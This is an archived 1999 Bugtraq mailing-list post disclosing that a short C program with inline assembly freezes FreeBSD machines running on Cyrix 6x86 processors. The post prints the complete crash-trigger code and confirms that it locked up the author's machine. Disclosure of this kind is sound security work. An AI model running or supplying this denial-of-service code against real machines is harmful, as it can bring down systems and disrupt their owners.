[9434] in bugtraq
Cyrix crash - FreeBSD
daemon@ATHENA.MIT.EDU (Patrick Oonk)
Tue Feb 9 14:45:23 1999
Date: Tue, 9 Feb 1999 13:14:24 +0100
Reply-To: patrick@pine.nl
From: Patrick Oonk <patrick@PINE.NL>
To: BUGTRAQ@NETSPACE.ORG
Ragnar Hojland Espinosa [ragnar@redestb.es] mailed me a
modified version of the freeze program that runs on FreeBSD:
int main()
{
asm ("foo:");
asm ("cwtl");
asm ("orl $0xe6ebe020,%eax");
asm ("jle foo");
asm ("addb %al,(%eax)");
return 0;
}
I compiled and ran it, the machine was dead.
CPU: Cyrix 6x86 (486-class CPU)
Origin = "CyrixInstead" DIR=0x2231 Stepping=2 Revision=2
Running at 150 mhz.
Patrick
--
While preceding your entrance with a grenade
is a good tactic in Quake, it can lead to problems
if attempted at work.